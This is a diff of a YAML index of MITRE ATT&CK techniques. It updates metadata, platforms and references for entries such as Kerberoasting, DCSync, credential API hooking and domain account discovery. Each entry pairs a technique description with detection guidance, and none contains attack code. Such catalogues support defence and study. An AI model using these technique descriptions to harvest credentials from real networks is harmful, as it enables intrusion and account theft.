+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -48113,26 +48775,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -48145,6 +48869,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -48181,17 +48906,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -48237,81 +48962,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -48324,28 +48978,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48402,9 +49122,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -48435,7 +49154,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -48459,8 +49178,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -48525,12 +49242,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -48589,7 +49305,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -48610,7 +49325,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -48631,13 +49346,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48660,15 +49373,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -48694,13 +49406,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48725,12 +49436,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -48772,13 +49482,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -48839,12 +49548,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -48908,19 +49616,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
